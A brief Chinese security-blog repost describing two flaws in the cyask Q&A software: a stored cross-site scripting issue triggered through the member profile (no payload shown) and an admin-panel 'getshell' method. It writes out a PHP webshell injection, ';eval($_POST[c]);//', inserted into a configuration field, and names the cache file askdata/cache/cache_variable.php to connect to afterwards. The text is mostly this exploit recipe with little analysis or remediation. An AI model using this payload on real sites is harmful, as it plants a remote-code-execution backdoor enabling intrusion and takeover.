cyask 前台xss与后台Getshell 没穿底裤 714文章 0评论 2019年12月31日21:56:36评论530 views字数 141阅读0分28秒阅读模式 摘要by 0day5_saline 首先是注册一枚 然后查看会员资料,发现xss已经成功的触发了 by 0day5_saline 首先是注册一枚 然后查看会员资料,发现xss已经成功的触发了 关于后台拿shell,在配置文件出插入 [php]';eval($_POST[c]);//[/php] 经过检查,只能插入四处 插入后连接 askdata/cache/cache_variable.php 点赞 http://cn-sec.com/archives/75408.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论